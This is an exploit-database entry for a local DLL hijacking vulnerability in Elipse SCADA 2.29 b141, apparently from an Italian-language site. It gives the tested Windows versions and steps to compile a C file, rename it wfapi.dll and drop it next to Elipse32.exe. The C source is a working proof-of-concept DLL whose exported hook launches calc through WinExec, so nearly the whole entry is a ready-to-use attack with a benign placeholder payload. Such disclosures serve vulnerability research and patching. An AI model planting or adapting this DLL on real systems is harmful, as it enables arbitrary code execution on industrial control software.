Elipse SCADA 2.29 b141 - DLL Hijacking

2015-04-10 13:05:03

#[+] Author: PETER CHENG

#[+] Exploit Title: Elipse SCADA DLL Hijacking
#[+] Date: 09-04-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor Homepage: http://www.elipse.com.br/
#[+] Software Link: http://www.elipse.com.br/eng/download_scada.aspx
#[+] Version: Elipse32.exe version - 2.29 b141]
#[+] Create and Compile the file then rename it to wfapi.dll and put it to the dir which the same with file Elipse32.exe, double-click #to run Elipse32.exe to launch the app.


#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }

int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.